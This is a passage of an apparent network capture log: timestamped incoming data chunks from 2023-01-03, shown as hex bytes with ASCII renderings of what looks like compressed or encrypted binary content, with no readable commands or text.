04 2c 7b b7 9f 24 56 6f 49 df a9 a9 6d dd 0b a1 3c 6e ea 27 92 58 e9 50 84 65 Data Ascii: U1li\F?e.]C)th(tM)H"mB&)a0XI&wh~q]@vT KnP:N`MM]~I;&}tr lT6\=f2x-(oaxC!wl^W(C t*>_}.IbJE\|2,{$VoIm<n'XPe
2023-01-03 15:29:20 UTC	1006	IN	Data Raw: 9b 8c 93 4e 49 d5 75 49 0a 27 c6 42 a4 2b 37 0c 9e 41 a6 9f fa 65 42 af f0 bd 14 9c 14 c3 92 fa 53 b4 e5 41 4e 8c 85 48 0b 46 fd 5c 00 3b 3f 7d b8 48 98 fc 71 39 88 93 76 b0 a4 01 14 9d 7c 88 13 63 21 9d de 9d b7 73 1e c4 05 3b bc 25 0c 79 e5 1f c2 49 eb 58 92 05 45 f7 38 c2 89 b1 10 e9 d3 e9 63 3f c1 36 e3 ee 2f 08 03 9f c3 8e e0 a4 bd 2c 09 28 3a e2 28 27 c6 42 a4 11 03 b2 cb 20 65 42 fa 39 82 4e 4f 38 8a 93 4e 48 75 fa c7 34 4e 8c 85 74 fa dc ab ae 67 a1 f4 f2 09 2b c2 44 8b 56 3a 4e 5a c1 92 46 51 f4 bc 0c 4e 8c 85 48 4d 01 b7 03 e1 b5 4b 65 36 a1 a7 3a 2c 03 27 6d 65 49 66 14 5d 95 c9 89 b1 10 29 50 7d 62 2c 84 17 5d ec 42 e8 37 7d 95 89 93 e2 58 92 01 45 ff 7c 9c 13 63 21 92 db 1a 91 1d 3c 52 da e4 4d 18 3f 9c 71 1c 27 ad 67 49 23 28 fa 4c 16 27 c6 Data Ascii: NIuI'B+7AeBSANHF\;?}Hq9v\|c!s;%yIXE8c?6/,(:('B eB9NO8NHu4Ntg+DV:NZFQNHMKe6:,'meIf])P}b,]B7}XE\|c!<RM?q'gI#(L'
2023-01-03 15:29:20 UTC	1007	IN	Data Raw: 7d 41 a8 0a 0c ad c2 49 99 2c a9 0b 45 6f 78 80 93 66 20 d2 9b 7c 37 15 18 c0 7b 14 4e 98 74 4d 78 80 93 62 59 52 1f 46 d3 fd 89 93 74 10 69 4c b0 de 13 48 d9 a4 44 13 a6 00 b5 aa 71 d2 26 96 34 94 d1 74 35 38 e9 12 9a 6e cb de b8 b7 23 34 2e cc 1c 43 98 74 0d ab c1 49 51 2c c9 84 a2 ab 1e e2 a4 10 44 6a be 30 2c 16 8c 9e 9c ef 4c 28 db 34 3c c4 49 c9 2c 49 97 a2 c7 3f c6 49 56 88 64 6a 52 79 00 d4 ae f5 72 24 6c 07 32 fb 31 4e da c9 92 8c 29 3a ef 2f 9c f4 37 7b f0 99 fa 87 26 30 2f 18 1c 48 28 de 95 fd 85 93 4e b3 24 45 8a 36 7f 8a 93 f6 21 d2 e9 aa cd c7 e0 c9 c9 67 67 09 99 65 a7 a7 38 e9 28 4b d2 a0 e8 f8 5a 9c 44 21 d2 fc 61 eb d5 20 d6 a5 8e b4 57 db 89 5a 9c 94 cd 92 3a 52 b4 e6 73 9c a4 8e 48 a9 bf 6f eb 00 3a e3 df 77 24 6c 07 32 f0 39 4e 0a 64 Data Ascii: }AI,Eoxf \|7{NtMxbYRFtiLHDq&4t58n#4.CtIQ,Dj0,L(4<I,I?IVdjRyr$l21N):/7{&0/H(N$E6!gge8(KZD!a WZ:RsHo:w$l29Nd
2023-01-03 15:29:20 UTC	1010	IN	Data Raw: fc 1c c2 39 3c a7 b5 76 dd 3a 7e 3b d3 60 93 69 17 3e 74 bb 75 2a 10 a2 66 8e d8 25 80 ce 59 23 4b 45 02 78 f3 ca e9 07 47 28 6d fa 25 59 c8 7c 23 cb ae 3f 48 83 e5 bb 3d ec 9d e0 c0 95 7e 75 42 01 f8 97 45 ad 13 3a c2 92 3e 0d 23 44 4e 42 24 eb bb 34 e1 6d 18 78 ad b1 cd 63 de b5 ad b6 07 25 85 87 b5 02 24 5c 6b 9e 66 ae da 56 ed 79 0d 3e 82 3b f1 c4 80 1b 10 7b 7e c2 a4 6f 04 8f 09 9c b3 1b 21 13 3c 1a 42 03 05 ff d5 c9 b5 a5 e9 2d ed 31 cd 67 2c 5c 21 d1 f7 56 92 cc fd 11 47 98 fb 93 22 27 80 95 f1 2c 25 a2 3f a5 6c 08 79 d0 09 5f fa 30 ec 53 88 b6 21 39 6d 37 4e 8b b7 e8 8b 72 76 9b 51 21 dc 50 31 d1 69 33 42 04 70 9a 5e 42 4d 27 06 bd d0 83 e0 dd 16 02 f9 91 2c c2 86 2f bb 9a 3b c7 20 2c 01 06 f6 d9 5a 2a 27 92 9d e6 34 9a c1 ae b3 4c be 33 06 32 c6 Data Ascii: 9<v:~;`i>tuf%Y#KExG(m%Y\|#?H=~uBE:>#DNB$4mxc%$\kfVy>;{~o!<B-1g,\!VG"',%?ly_0S!9m7NrvQ!P1i3Bp^BM',/; ,Z'4L32
2023-01-03 15:29:20 UTC	1019	IN	Data Raw: 84 1b d5 8a 5c d5 da 1b 6b 56 53 f7 a1 73 69 84 ad d8 88 23 16 43 eb 0a ed 15 02 11 1f 7c 03 93 6f 0b be 21 79 f5 88 2c 79 75 ea 5c 57 63 30 4d cf 33 69 86 06 29 78 ab ec 16 e2 28 d8 62 b7 7f aa ca e6 a8 2a dd 8f 36 30 ee 90 0f 09 0c e4 d3 4f 74 99 50 f9 a1 67 a7 97 75 01 93 c4 ab 61 44 07 9f 17 46 98 23 ce 5e 1e fb 27 58 6a 49 8e ab 48 07 60 d8 f5 46 76 c3 77 39 96 40 af 13 f7 ac 49 0e f7 16 c3 42 17 59 c4 de f4 ac 85 15 3a 69 5b 54 6c 9b 64 d8 5d 46 8e ba 31 c0 c6 14 56 06 de b9 c5 c2 83 16 42 c2 6a dc 63 91 7a 3c 38 98 b6 48 55 c9 2d 4b 86 a9 10 39 f8 9d d2 21 42 9d d3 dd be 2a af 14 db f3 b5 bf c9 da c5 64 cc 6d 67 c7 ad 2e 04 a7 d4 3b cf d8 5d aa 8b 90 ab bc 29 f6 46 a7 8e 77 c1 b0 c6 83 b8 d8 3e 4c c8 55 3e ec 67 b6 5e 40 02 ac b8 d4 2e 8f e4 ee 27 Data Ascii: \kVSsi#C\|o!y,yu\Wc0M3i)x(b60OtPguaDF#^'XjIH`Fvw9@IBY:i[Tld]F1VBjcz<8HU-K9!Bdmg.;])Fw>LU>g^@.'
2023-01-03 15:29:20 UTC	1035	IN	Data Raw: e0 a1 ea fa ff 9d 19 c3 30 f6 2d 45 39 f6 50 96 ec 6d 84 52 4a 22 cb 98 0a 43 33 21 3b 53 49 f5 94 56 a5 45 eb ab 5d 96 92 8a a4 1e da a4 90 27 6d 92 16 ca 13 4a 1e 25 a9 78 48 f2 9e 33 66 64 ae 19 bd bd ef ff f3 79 fe d7 0c 77 e6 de ef 99 df f9 9d 73 bf df 73 7e e7 37 ee 4c 9d 44 0d 50 57 12 d4 22 48 f7 0f e2 10 84 7e fd be 83 4c fc 34 a7 71 ff af bb 42 98 b2 a7 72 2f 38 de da b8 61 30 d8 fd 3e b3 1b a8 dc 54 19 2f 54 d9 f3 70 e6 85 a1 0a c5 ef 3e ec 0b ae 55 01 7f 41 e2 5e 8e 43 4c c2 ad e7 9c 44 23 70 d8 d2 2c f8 42 74 50 0c 03 ad e1 94 c1 9d 50 48 0e 95 83 b4 3d 12 9e e3 8b b4 bd ae 1b 69 fb 9c b5 3d cd 92 14 70 a4 56 b6 1e 54 5e 31 b2 60 d2 99 e0 88 18 cb 1a 50 ec ce 36 33 80 5b 59 a8 09 d3 07 9c 7c 22 3b 95 05 7c 97 31 75 68 0c 1a 88 4b fe e2 0c ba Data Ascii: 0-E9PmRJ"C3!;SIVE]'mJ%xH3fdywss~7LDPW"H~L4qBr/8a0>T/Tp>UA^CLD#p,BtPPH=i=pVT^1`P63[Y\|";\|1uhK
2023-01-03 15:29:20 UTC	1036	IN	Data Raw: 7b 83 f4 6f 80 92 6a 29 27 41 24 e8 8c 43 dc 45 08 97 a7 1d 93 c1 85 e2 05 eb 85 70 74 00 0e 74 80 33 a6 17 7f 3b 15 4c 5a 7c ec b3 40 f9 59 21 4f 1d 92 dd fa 32 95 43 b6 11 2a 1f 3e 0b 6f 26 61 97 d4 c4 41 11 b0 8b d0 43 a1 03 a9 4e 52 36 11 cd 80 2e 66 7c 56 38 b1 ee e0 b7 c6 70 2d 70 7f 68 3d 02 a4 44 c6 ed 12 c4 91 e9 38 e3 e7 72 92 08 17 d5 6c 01 ee e9 6f 24 05 f1 f0 65 1c 42 ad 9f 55 73 90 7d 6f 3b 14 67 0a af af 30 06 b5 e4 c6 c0 0a b9 97 8a 21 0b 28 48 76 86 83 0d 3e fa 49 42 19 f4 11 ae 9e 5b 80 8b c7 db 04 a0 e9 a9 db 24 88 3e 5b 70 56 7b e1 e3 60 49 68 bc 0c 1b cd 0c e5 39 0d 8a 83 6d 43 ff 87 19 ee 8c 21 61 d8 a5 41 fc 19 cf e3 4f a2 02 e2 cf 36 86 e4 6e c8 9f 33 9b 8a 9e 43 31 49 39 aa 3d 05 f8 c7 ad 18 cb f4 61 00 c2 24 fd c9 34 10 4a 5a d4 Data Ascii: {oj)'A$CEptt3;LZ\|@Y!O2C*>o&aACNR6.f\|V8p-ph=D8rlo$eBUs}o;g0!(Hv>IB[$>[pV{`Ih9mC!aAO6n3C1I9=a$4JZ
2023-01-03 15:29:20 UTC	1051	IN	Data Raw: 22 53 23 e4 a0 8c 60 f7 74 96 a8 58 53 fe c0 5a 06 d9 1a 45 cd 03 76 2c e0 85 a4 7a a2 ee 1f e2 a7 bc 40 cf 51 41 1e ce f8 07 dc d9 54 b8 91 ff 0e f7 3f 20 89 fa 1b 24 48 10 1a b7 00 c2 a4 52 c2 ad b1 04 d0 1f 55 13 a4 8a 26 63 93 fa 8f 1e 94 c0 48 c0 bf 85 cd fe bf 08 fb 9f 92 b9 76 02 08 47 2f 18 1c e1 c3 4e 00 df 85 4e 00 3d 06 cb 87 14 6e 67 e2 63 e4 a0 68 2a 15 d7 63 aa f6 f8 a9 55 a2 97 26 e7 a3 57 12 fb a8 e8 93 ff 20 24 e4 f8 f4 7f 04 ca 16 4b be 73 02 f8 9b 84 fe ee 7f 8b 40 bc 3c c9 f5 04 a0 7a eb 04 40 38 4b 8d d1 95 44 39 01 fc 37 02 a0 b9 0e 24 4a 9e cc 54 8b c6 21 ff a0 8d 5e 30 a5 0f af f1 88 bd 67 78 b0 f6 a8 da 9a f5 7b 27 ec dd 61 bb 3c 85 ad b8 93 7c 86 8a ef f7 8a 13 40 c7 ca 3f 3c 85 72 8f aa ce 20 aa 3a 17 fe a9 ce 8c ff 7b 74 d0 ba Data Ascii: "S#`tXSZEv,z@QAT? $HRU&cHvG/NN=ngch*cU&W $Ks@<z@8KD97$JT!^0gx{'a<\|@?<r :{t
2023-01-03 15:29:20 UTC	1067	IN	Data Raw: 8e c5 3f 0e 92 d9 0e ef b7 42 bb 31 56 d3 3a 0b b7 bf df bf 7f 63 f7 56 e4 3b b3 73 e1 72 b3 f1 d8 e3 7a f0 78 02 cf 3e a4 02 b2 05 2e 8e 1d 04 f8 7f 4e 21 a8 1d f0 e0 b0 91 0c 9b 7e 5f e0 11 b0 33 7a b3 d3 4a a6 38 93 36 cb 11 df 19 c6 11 6f 17 26 92 8d fa 8d 76 3f 0f df 8d f1 43 3b f3 04 ef bb bb f2 aa b4 ef 08 91 07 19 04 95 42 08 05 44 98 26 97 cd a2 99 e1 d9 9d 96 84 61 e6 b9 dc 32 fb ec a9 69 cd 9c 82 ac b7 6d ec 05 c5 f4 9f 9e d6 ee f2 bf af 6f ad 17 e8 ba fe 32 47 d8 13 43 4e 2d 1f 5d d9 74 1f 5f 5f 61 f4 83 fa e7 1c 7e d9 5e 09 5a ea 48 d4 d0 0b 76 21 f9 e1 ac d3 85 09 a9 c4 fb 2b d5 e9 cc 78 a1 68 d5 eb 12 19 73 35 08 90 7f ce 6a 05 b6 24 ad 80 8b f6 c9 6e d1 5b 39 cc 1d 07 33 69 74 12 cd 83 9e 1a 72 eb 30 c2 9e 40 bb c0 c0 42 82 e2 17 55 95 93 Data Ascii: ?B1V:cV;srzx>.N!~_3zJ86o&v?C;BD&a2imo2GCN-]t__a~^ZHv!+xhs5j$n[93itr0@BU
2023-01-03 15:29:20 UTC	1068	IN	Data Raw: 10 aa 7d fa 75 a0 71 9c f1 d5 1d 3e 7e df f3 4d d2 84 fd b9 0c 0e 42 f6 02 25 d2 c3 1e b7 b5 d6 f9 18 37 1e a5 ac 3a 76 5c 8c 0e 91 a5 9d d6 59 36 30 9f db 5d e6 ac 3a 01 54 34 bb d5 77 cb a6 dc bc f6 91 e3 05 79 c1 14 14 4d 39 bf 9e 12 53 80 76 27 20 e7 8b d5 e6 8d 81 1c d7 c7 7c 54 7c c5 69 e6 b2 6b 06 83 47 9a d4 22 bf e7 de 81 0e 49 5f bc 52 58 16 d9 c3 9f 75 d6 89 9d d3 b5 ff e6 4a 6a 75 37 9e 34 4c ba b8 94 cc d7 74 80 ee 1f 20 a1 99 f7 5e 7c 1a 17 c5 4d ce 3b 93 c4 c2 11 77 b3 5b 29 82 3f d1 df 7c 5c f7 3e ad b3 81 1d 39 63 13 ab c9 82 93 4b aa 8e f5 5b 47 fc 0b be 0c 67 58 f1 aa 61 38 ae 76 cb 81 ce 0c 46 bd f9 c2 c2 6d 3a 42 0f 85 8d 63 54 66 e0 8a 3a 6e fc f1 58 69 fa 0f 6d e0 44 d6 6b cb 57 f6 50 d6 84 c9 79 a1 50 63 93 28 0e b5 af 8b a3 48 e6 Data Ascii: }uq>~MB%7:v\Y60]:T4wyM9Sv' \|T\|ikG"I_RXuJju74Lt ^\|M;w[)?\|\>9cK[GgXa8vFm:BcTf:nXimDkWPyPc(H
2023-01-03 15:29:20 UTC	1072	IN	Data Raw: e0 35 aa 27 52 6b 63 a4 28 29 b9 2a 99 91 f1 f2 ed 12 26 3b 2e 80 6e c7 66 a8 49 96 01 da 00 4d 8a 88 59 23 a7 91 bd af a2 51 36 ab e3 d0 4d 28 02 38 cf 63 57 8a 22 06 71 6c 1a 29 e9 8a 46 03 fb 86 ec 46 40 41 4b d3 d0 8f ef b5 fc 9e 4d 44 29 be 68 67 cd ad a7 ce 36 03 38 58 3b 30 da 32 ec a5 77 7d 48 90 65 db d4 9b 77 6e 72 cc e2 3d 56 75 5f ba af 87 ce 6d 3d 15 69 a3 6e 09 a1 e2 cd e6 25 1a d2 15 10 6a 3d 02 82 68 30 3c 8f 89 9a 8f 46 92 0e 86 4d 6a 47 86 0d 6b 51 75 75 e8 6a 54 cc a0 bb 5f bb b0 a3 f8 65 9d a2 08 df 6f e2 35 72 4b 42 06 2d a0 33 24 d0 2c 88 75 06 c2 a9 35 b6 e9 d4 e0 6f ab ab 56 82 d5 ce cd d6 a1 38 44 f3 24 3c 84 66 3b 79 5a dd e4 fc 54 01 9c bf 53 6b 79 0c 3d 01 9c 0a ae 96 3e 4c d9 2d 27 6e 97 ce fa 7a 1b aa 6b 7f fe 63 ff fb 1f 9c Data Ascii: 5'Rkc()*&;.nfIMY#Q6M(8cW"ql)FF@AKMD)hg68X;02w}Hewnr=Vu_m=in%j=h0<FMjGkQuujT_eo5rKB-3$,u5oV8D$<f;yZTSky=>L-'nzkc
2023-01-03 15:29:20 UTC	1088	IN	Data Raw: 75 bc 7a 39 f1 e4 f6 2e 6e 64 e6 e1 f4 73 d1 ae a1 56 5e 82 8d 0d 55 1c 8f a6 0e c9 4e 98 a2 f1 ae c9 8e 33 75 f9 5e fb 9e e2 cc 31 b0 0e 91 d5 e5 54 c3 15 7a 03 fa d3 21 d7 31 4d 3f c6 ca ae 89 ff 65 36 9f 8d e3 5d 67 93 ea e9 fe 6a 16 c4 bd 8a 1a f1 a1 76 ce 69 4a b1 0d 62 38 21 d3 10 8b bd 7e 67 3c c3 87 f7 5f 98 05 13 17 22 24 d2 fa d1 b7 b2 2a 1d 68 be 2a bb 56 ec 79 8c 48 27 5c 78 c3 ec a7 13 45 62 3a 9f 0d e9 91 1d ba 7e 0a 06 04 f4 56 4b 00 a2 8e 97 9e 75 b3 d4 a0 82 28 5a ed bc 2a 09 2b 92 a9 b3 72 54 f3 1c c6 10 11 c3 65 bb a9 ee 5a f5 70 a9 52 61 21 3f 02 f6 79 da 8b 9b 1b a5 c2 61 03 b3 f5 01 ce a5 01 84 50 60 ef 81 2c b2 eb d8 97 ef 05 b4 b2 a7 ed 06 03 0f 45 cf b3 1f a9 cd 56 8a ae 1c 33 ee d4 4d 2f 86 5d 5f ed 43 14 e6 a3 a6 b7 ab 5d cd 05 Data Ascii: uz9.ndsV^UN3u^1Tz!1M?e6]gjviJb8!~g<_"$hVyH'\xEb:~VKu(Z*+rTeZpRa!?yaP`,EV3M/]_C]
2023-01-03 15:29:20 UTC	1089	IN	Data Raw: 96 98 7e b3 ff c0 75 6b 54 74 2f 0b aa e5 ec a1 9a 04 b7 bc ca 6d 15 f6 82 90 12 6e cf cf 44 8b f0 c9 ce a8 34 4c 7b 95 6a f0 b9 6e 18 bd 7c a9 9b b8 a9 f2 f3 3d 01 d7 e6 1a fb a4 c1 72 1b db 7a ca 10 fc c8 c6 9f 65 60 71 7e 6f 2a 7f c7 3b 79 28 0b 7a 09 9a 77 f4 5e 41 18 95 fe 90 c4 0a a8 8f 1a 56 7d 0f 1a 6b 21 02 c5 0f 84 b1 7a 5b f4 b5 2d 0b 34 6e c7 ac 0d b8 36 03 ab 74 40 90 42 3b 56 97 7e 7d 15 36 24 93 0c 51 09 c1 00 88 56 06 6d 03 2b 33 7c 34 5c 23 1f af 69 4e 7c 8b b2 bf 3f a7 d8 b6 67 22 d7 16 65 91 b3 b0 29 78 27 9a 31 aa 34 0f 25 7e 95 dc ea 03 ad 96 2a 18 0f 20 03 07 3a ea 23 dc bc ca 25 e2 fb ce 35 38 53 cb d9 f7 c3 e6 45 d2 b6 e3 45 8a 6d 05 d5 18 eb 27 bb de 30 f8 79 4d 5c 8e 6f 38 a0 41 61 f5 e8 d6 f8 3b 40 a8 31 68 fe 05 cb 05 cf f0 0a Data Ascii: ~ukTt/mnD4L{jn\|=rze`q~o;y(zw^AV}k!z[-4n6t@B;V~}6$QVm+3\|4\#iN\|?g"e)x'14%~ :#%58SEEm'0yM\o8Aa;@1h
2023-01-03 15:29:20 UTC	1105	IN	Data Raw: 00 72 9d 0b f7 1f 41 24 ff 00 62 6c f6 0f 20 22 7f e2 92 56 36 ee 9f fb f3 47 9a fc 18 fa 07 80 3f 52 e4 3b db 75 00 c7 2b 80 3d c0 0a e0 09 f0 02 b8 63 93 1e 03 5c 01 be 00 c1 3f 21 ec 1c 70 1d f0 df 7a d5 f8 ba 09 76 82 8c 7c aa a9 4c 7c 8b fe 16 f6 9c 58 55 45 41 07 9b 14 f5 6b 88 13 fc 82 c0 b5 2f cc f8 55 da 56 4e 43 0e 00 a8 8a 27 44 59 e0 61 53 01 4f 9f e8 2a 62 30 98 f9 f9 79 0c e6 6a 71 71 11 8d c1 1c 1e 1e 1e 1f 1f a3 d1 18 f4 d5 d5 af 2e a3 31 9b 9b 9b 5b 5b 5b fb 7b 7b 07 07 07 e7 e7 17 28 14 0a 02 81 5c 5e 22 57 56 56 ce cf cf d7 d6 d6 77 77 77 4f 4f 4e 30 18 24 0a 83 d9 de de 3e 82 1e 21 10 17 70 f8 f9 fe c1 fe d2 d2 f2 e5 c5 e5 ca f2 32 0a 85 dc d8 d8 5c 5f 5f c7 a0 2f c0 60 f0 ea ea 2a 06 8d 42 22 d1 67 67 67 50 28 f4 e7 e8 8f d6 96 16 cc Data Ascii: rA$bl "V6G?R;u+=c\?!pzv\|L\|XUEAk/UVNC'DYaSOb0yjqq.1[[[{{(\^"WVVwwwOON0$>!p2\__/`B"gggP(
2023-01-03 15:29:20 UTC	1106	IN	Data Raw: d4 d8 4d 63 db 4e 1a db b6 ed e4 49 2f ec eb bf 75 3f 7b 3f 77 3f bc e3 1d a3 e3 1c 39 d7 5a e7 3c f4 3b 38 67 57 cb 79 e3 69 d2 e1 d3 f2 f7 1f b2 0f 63 c5 8e 3e fb 5c 45 e1 48 7d 4f c4 a2 91 37 02 d4 73 f8 55 91 b8 fc fd 5f d5 bf 1e 10 4b 92 f4 4e 4c c4 5a 61 32 78 90 e7 ca 0b 03 5a 84 92 80 e2 e1 10 67 c2 f5 fb f9 f9 61 0c 19 a6 a6 31 51 30 7a 24 13 51 54 03 b0 08 c1 67 80 57 7e e6 a5 ba 09 00 42 11 21 08 c4 10 c4 20 16 3d 17 47 09 07 d0 2c b3 a9 f2 e7 77 68 5a 01 6e ca bf 34 ee 3d c0 85 54 60 06 1f fb 59 7e b2 fe 6e b7 dd ff 7a 7d 73 45 e8 c3 9b 3e 07 18 08 13 16 b9 56 46 51 61 76 a6 e4 b9 7f f5 43 e5 78 ae 4c 4b c4 1c f7 4d ab e1 a8 eb 87 33 3c 19 ed f9 ac 3b 41 d0 de 4f cd b8 49 2e 94 28 c3 2f 67 7b ed 4a c7 bc 6f 0f db 72 bc 8f c6 ab 9c 0f 0f 20 77 Data Ascii: McNI/u?{?w?9Z<;8gWyic>\EH}O7sU_KNLZa2xZga1Q0z$QTgW~B! =G,whZn4=T`Y~nz}sE>VFQavCxLKM3<;AOI.(/g{Jor w
2023-01-03 15:29:20 UTC	1122	IN	Data Raw: c5 a5 be bc e6 d0 c4 0e ea 81 46 c5 d5 77 b3 95 0f d9 60 58 71 89 43 a0 19 73 72 f1 f2 44 07 d0 1b 9a dd c0 13 13 22 2d fa 48 33 a5 74 ae b1 fb c2 35 e8 61 3e 14 92 a6 53 a2 65 24 b6 b7 69 4e 26 dd 7a 72 d8 d2 f0 74 75 65 d5 58 5e 03 c6 a9 8f 16 f8 b9 be be de 66 86 3f ef c8 82 61 5f aa 9e 04 d9 ca c4 e5 ad db 5d af 96 79 3b c5 01 c7 7a b3 b5 d2 f1 7b f9 c0 cd 59 bd 99 3a 59 de 51 f3 e7 28 1e 88 f8 85 84 60 7f 3b 2d f6 78 01 8c 2a 68 22 d2 c6 a5 00 c7 d4 98 a6 e2 c4 0c 6c e5 28 49 90 ee 9a 20 d1 3a c7 90 6f 3d b4 0b 03 68 5d ac 39 ac 0b f5 0b 64 18 32 16 c2 52 10 32 67 d4 5f 7f 3a 47 7c a6 2e 47 e0 84 56 04 92 77 62 94 ca 1e 46 6a 9e 48 e2 05 71 94 87 62 46 73 56 d5 4f 66 6e e4 31 67 83 c9 5b 5a 9f 9d d2 a9 b7 33 b9 14 f2 e0 42 d1 40 62 23 67 c3 40 73 0c Data Ascii: Fw`XqCsrD"-H3t5a>Se$iN&zrtueX^f?a_]y;z{Y:YQ(`;-x*h"l(I :o=h]9d2R2g_:G\|.GVwbFjHqbFsVOfn1g[Z3B@b#g@s
2023-01-03 15:29:20 UTC	1123	IN	Data Raw: 4d 06 99 73 1a dd 6f 11 ad 12 17 df f5 a0 71 ea a2 0f 53 df da 70 0c 51 80 cb 9a 48 ad bf 3b 9b 70 96 87 77 d2 4d b1 a8 e7 f6 e4 12 23 85 7b 03 a5 f8 96 4a 89 e2 45 2f cb 2f 14 97 48 08 63 8a 40 d9 0d 27 23 b4 2a 41 6a 10 51 64 1c e2 57 23 78 ae 2f d1 ce 08 1f 8c ae ed 10 d6 e7 15 37 81 f7 49 d4 21 af e7 8b 09 c5 25 ba 3a 14 a2 ba 63 51 38 70 53 8b 11 77 92 dc 16 ff 46 2d f5 45 cb 92 99 b5 ee a8 46 a1 36 a9 b6 e0 f4 10 7f 23 4a c8 50 e8 55 de 04 8c ba 08 a3 94 3e ca 42 01 d6 f2 e2 ab f3 71 36 35 2e 69 7a d0 35 42 28 f1 9e d6 d0 c6 8e 84 25 82 80 ae 61 04 9a 66 e7 2e c9 22 a8 c1 ad 69 f7 26 30 78 75 4b 9b 3c a5 c6 04 01 9f a0 6d c4 56 a9 d5 1a c1 15 ee 05 a9 b0 29 71 68 36 c1 2e d1 b9 ff a6 d3 15 5b 38 ed 1e f8 88 86 a4 53 53 36 3e ed be 4c ae 0c 0d 92 a6 Data Ascii: MsoqSpQH;pwM#{JE//Hc@'#*AjQdW#x/7I!%:cQ8pSwF-EF6#JPU>Bq65.iz5B(%af."i&0xuK<mV)qh6.[8SS6>L
2023-01-03 15:29:20 UTC	1139	IN	Data Raw: bd bf 80 8a b3 d9 f6 06 71 9c 0e ee ee 24 21 b8 bb 93 00 49 08 90 40 70 77 08 ee ee ee 16 20 78 f0 10 dc dd dd 21 b8 37 ee dd 78 37 da 43 ce fb be f7 9e 73 ee 39 77 ee 37 ff b5 66 cd cc ff 6b 16 bd 9a a7 9e da b5 6b d7 96 df 7e 6a 57 53 d6 27 1c 9f 91 b9 a7 73 17 d0 ca 72 7f be 48 20 b2 15 31 a4 c5 bc 0a 11 b9 2c fe b6 f4 5e 5b e8 14 5e d7 e3 d8 c7 89 fc e4 e5 1e 02 7f f5 12 1d c5 8d 39 0f 55 3b f8 19 86 f6 19 62 39 51 3e 30 71 43 f4 ac 13 71 95 c3 77 c0 de 58 0f d3 4b ef 82 2d bb 87 58 59 4f 36 5d b6 45 7f 71 0d e3 f3 36 83 c1 c9 a0 0d 74 da a8 c2 60 ac 7d 46 7f 11 2e 22 b1 c3 19 79 83 56 44 d8 98 74 7c 58 99 72 36 18 ea b1 91 0e 4d 6c 09 61 c6 d2 bd ce e8 e6 d6 e2 d8 3f 0b 9d 32 39 15 d2 b6 c3 5e e6 be 66 bb 5a cb 9b b4 1f fc 92 31 3c 55 a2 14 d9 5d 1a Data Ascii: q$!I@pw x!7x7Cs9w7fkk~jWS'srH 1,^[^9U;b9Q>0qCqwXK-XYO6]Eq6t`}F."yVDt\|Xr6Mla?29^fZ1<U]
2023-01-03 15:29:20 UTC	1140	IN	Data Raw: 1b 9e be b1 eb 62 b7 5c c9 be d9 11 01 97 de 24 77 a5 e4 be 10 41 81 8c ad 3b 94 26 07 e7 8d 91 1b b7 dd 6c ea 81 65 f4 f6 1e c2 47 a4 8f 25 11 7f 3a ea f5 64 ae 15 6f 07 4a 37 e1 f8 ec 14 e3 c1 f1 21 3e 2a 10 0d 6e 83 f3 e4 89 57 a5 35 c1 44 7c e2 b3 c5 97 a6 e5 46 2b 6b b7 aa 9a 38 54 47 02 04 7a 0c c8 be 4c 5d 10 90 33 b8 ce cc b5 82 58 13 e7 0b 3a 9b fe d8 a9 4d e3 45 55 3b 74 fb ad 42 a0 70 3f 73 e8 5c de 40 0d 64 a3 6a ea 28 fe 90 0a 19 05 ad 9b 9b e4 ae 8b 96 60 df 3b 9b 28 88 61 bd 33 2d 1b c1 b5 94 d7 06 e1 d6 dc 81 78 65 f1 d1 da cb 87 87 63 c8 52 d2 ed fb 03 73 39 cd 36 dd 45 e7 17 27 b7 7b 9b fb e2 9e 65 37 d7 0d 2e 16 bd 76 91 41 b4 52 bb 56 d8 c6 9e 40 f2 a7 63 eb 23 45 95 35 e4 52 8a 29 ac 86 86 c4 33 dd 33 f9 00 de 41 81 46 94 0a f1 2b c5 Data Ascii: b\$wA;&leG%:doJ7!>*nW5D\|F+k8TGzL]3X:MEU;tBp?s\@dj(`;(a3-xecRs96E'{e7.vARV@c#E5R)33AF+
2023-01-03 15:29:20 UTC	1142	IN	Data Raw: 08 64 67 fc 9c 42 7f 77 4f eb d5 ee 82 4c 34 9a 1e 8a 1c b9 d6 43 4c 2e de 0b cd 9a d8 5c 63 08 dd 2c b9 08 f6 37 9a f9 4c 73 77 4c 65 a5 ce 47 69 24 d3 f8 d0 62 14 95 de 0a 47 de 21 16 53 12 ef 93 9e b7 dc fc 7c eb b9 4b bb 38 31 be 0c d6 40 9c 01 3d a7 41 3f 82 d7 e5 99 e6 a8 5e 35 1e 79 60 03 62 f8 7d 8c 7f 76 7d 79 ff e8 3b 23 8e 95 cc bd 4a 83 3c 0e eb 39 07 2f e7 53 11 b4 a3 f6 2e 11 15 d0 a7 9b f1 58 35 83 c7 80 2b 81 6f 4a 1f 21 5b d9 ba 5f 4a 3e 7d 73 a1 58 56 63 ed ec 9d a2 5f 81 38 03 42 62 c9 62 05 23 c5 07 ba b8 53 10 1b 32 ab b5 ef ab 2f e8 59 b4 6b c6 08 9b 6f c1 ce d2 0a 5c ed 2b 95 08 96 0d 8f 41 14 37 f2 11 20 3e 07 17 b0 19 e8 fa 8a 14 ab 10 c5 46 6f 67 b1 a8 ca 79 16 cd 6a c1 87 44 d0 43 43 ce c1 ce 10 32 50 1e 16 35 50 49 fb 9a 73 21 Data Ascii: dgBwOL4CL.\c,7LswLeGi$bG!S\|K81@=A?^5y`b}v}y;#J<9/S.X5+oJ![_J>}sXVc_8Bbb#S2/Yko\+A7 >FogyjDCC2P5PIs!
2023-01-03 15:29:20 UTC	1158	IN	Data Raw: 5d 25 12 83 5e 81 ec dd 29 b4 db 43 19 c0 77 d7 d7 32 1f ff c9 74 5b 65 2a f9 02 2a e6 25 58 af c3 db 4f 79 02 a2 fc fe 85 23 f0 04 5e 7f 64 89 b2 c3 6f 91 21 21 14 fe b2 2d cf 7e 8e 48 97 99 e3 da 73 6d 1c f4 8f 7e 66 12 7a 3b b4 72 9e db 0d 60 17 3d a5 f3 9c 9b b4 bc 39 61 5f 8b 91 71 fb 64 1c 2a f1 a7 75 fc 07 b8 19 02 dc ae 0a f5 02 46 1e ec a8 d4 c5 6c 9a a8 d9 f0 6e d7 6a 5a 89 c5 78 90 a2 70 bc 94 68 e9 83 98 2c ff 2e e8 07 9d 47 d9 79 c6 e1 3e 8a b1 8d 1d 41 0a 30 83 32 8b 06 d5 b6 a9 5f 90 d3 7e db cd 7d 0a 63 ef 82 c7 a7 fe 3b 24 b4 24 6f 78 f5 1c 83 be d5 4d 58 98 